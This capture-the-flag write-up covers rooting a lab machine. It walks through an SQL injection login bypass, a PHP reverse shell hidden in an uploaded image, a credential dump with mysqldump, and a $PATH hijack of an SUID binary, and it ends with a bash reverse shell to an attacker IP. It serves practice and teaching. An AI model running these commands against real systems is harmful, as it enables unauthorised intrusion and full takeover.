80127c661a9158af92d8b446c1040b78.png

0. Preface

The SQL injection took me the longest to get past because I didn’t notice that burpsuite gave a ‘302 Found’ as I was expecting the page to automatically redirect. Otherwise, this box is a pretty straightforward one.

In this box, we will be tackling:

  1. SQL Injection to get login bypass
  2. Uploading “images” to get a reverse shell
  3. Using mysqldump to dump databases
  4. Exploiting the $PATH variable

1. Preliminary NMAP Scan

sudo nmap -sC -sV -O -oN nmap.txt 10.10.10.185 -p- -v

a2d2f4bfec6b274ea41cba8efccaef18.png

This is a linux box running on Ubuntu. There is also a web server running on port 80.

2. Taking a Look at the Website

579ad5c0898f6494171cb26460d3b854.png

Doesn’t seem like much here, let’s see what the login link on the bottom left looks like.

7cf4d2b1cb424b41dbd280d56feda98d.png

Seems to be running on php.

3. Gobuster Scan

Let’s run Gobuster to find out what other directories/.php files we can find.

gobuster dir -u http://10.10.10.185 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

dd751848650f0faa62ebd8bc20355c68.png

Nothing much seems to jump out from the gobuster scan, except for upload.php. When accessed, the page redirects back to the login page.

So let’s go back to see what we can do with the login page.

4. SQL Injection

Let’s get Burpsuite going, and try SQL injection. Intercept the login and send it to repeater using Ctrl+R.

First, let’s try sending a normal request with a random username and password.

ffe7a92e3749ea36d8b147ef543dda87.png

Notice that an alert gets thrown - “Wrong Username or Password”

Add in a single quote to the username, the alert disappears:

86e80c73e1d682b77adeae3d3f692a78.png

Let’s try more stuff:

f6d83804c41ab7bc509c93b23dc31d4a.png

Notice that the HTTP header says 302 Found instead of 200 OK? That means we most likely got something.

Let’s try accessing the upload.php page again. We’re in:

83a77b43dd7ee1ad6cb0f653429f2286.png

5. Trying To Uploading Something Malicious

Let’s try uploading a text file.

29fc2fbf5018902801402f96fa702dd1.png

Alright, so let’s try uploading an image file, then adding a php reverse shell to it using Burp.

The php reverse shell by pentestmonkey can be obtained here

Like so:

8061570f047fe080bcf59d9bbefc2c26.png

Don’t forget to change the LHOST IP address and LPORT number before sending this over:

cec8f467bddf057ec972bbf0aefdaea9.png

And we have successfully uploaded it.

f1913245c476d2ce82010fd518b2d627.png

6. PHP Reverse Shell

Let’s setup a netcat listener on port 8000 to catch the reverse shell.

nc -lvnp 8000

Next, we access the malicious file using a web browser http://10.10.10.185/images/uploads/5.php.jpeg to trigger the reverse shell.

There we go, we caught the reverse shell. And we are logged in as www-data:

7cdec398acb1ca8b182100801b6644f9.png

Let’s upgrade it to a full interactive shell using python.

On the remote machine, run:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
export SHELL=/bin/bash

Next, background the reverse shell with Ctrl+Z, then run the following on the attacker machine:

stty raw -echo;fg
reset

7. Enumeration

Let’s take a look at the /var/www/ folder to see what we can find.

2b86e9fb2f6d513a90b6a3c89ef34c91.png

Let’s take a look at db.php5. And we got a username and a password:

dde8edb81e23c065f27e3956c5ffb9d9.png

Let’s see if theseus actually exists in the /etc/passwd file.

9feac5a95648e4e663457d9fb82011fa.png

And yes it does exist. Also note that a mysql account exists. That means mysql is most likely installed on the box.

Let’s try su theseus first with the password we got:

941650b4349b7c4c5514285c644a89c5.png

No luck there. Let’s next see if theseus can access mysql.

246d7ba62166a2d346ac179276501874.png

Weirdly, the mysql binary is not found on this system. Let’s see what other mysql binaries we can make use of by using the following:

find / -name mysql* -type f -perm 755 2>/dev/null

4c10a6e5c393f9fce0e98f97bbf27653.png

Notice that mysqldump is installed. We can use that to dump the Magic database by running:

mysqldump -u theseus -p --databases Magic

And we have another set of credentials in the login table

8e5096993623ae1f582905870f64f5b7.png

8. Privilege Escalation

Let’s try to su to theseus with the new password we found. 720049f3f38efec69a22cb8cde2f9315.png

Success. Let’s first grab the user flag.

Next, let’s upload and run linpeas.sh to see if there’s anything we can exploit. This will take a while.

After linpeas.sh has finished, we can see that there’s a binary called sysinfo owned by root that has the SUID bit set:

c94b7689906caae6adf0c8c4601a061f.png

This means that this binary will be run as root, even though we are logged in as theseus. Let’s see if we can exploit it.

We can roughly try to see what this binary does by running:

strings /bin/sysinfo

bb9ddd29d0edc9ee56d5b0f34c9c803a.png

Seems like this binary is used to output system information. We could intercept this by creating a symbolic link to /bin/bash for any of the applications that are being run. Let’s use fdisk to do this.

First, create a directory in /tmp/ and create a symbolic link named fdisk to /bin/bash by running:

ln -s /bin/bash fdisk

cb7f73c61f00b8381f79cea9019e3bd0.png

Next, let’s add the /tmp/ directory we created earlier into the $PATH environment variable so that our fdisk will be executed before the one located in /bin by running:

PATH=/tmp/dir:$PATH

6acd7048122b8d18ec851d3573c2c631.png

To test this, run which fdisk to see which version of the binary will be run first. In this case, it will be the one in the /tmp/ directory.

9aeed7a67af28afa3657d201944716a1.png

Let’s now run sysinfo and we get a root shell.

28d2d640321609bb2a4e974a13cc843a.png

However, the shell doesn’t seem to output anything.

23af8535782afe77345a2989f4f52e29.png

Let’s try executing a bash reverse shell from the “half” shell by running:

bash -c 'bash -i >& /dev/tcp/10.10.14.43/8888 0>&1'

And there we go. We got root. 4a7dbba326bc1cb759cbd5d860d56e24.png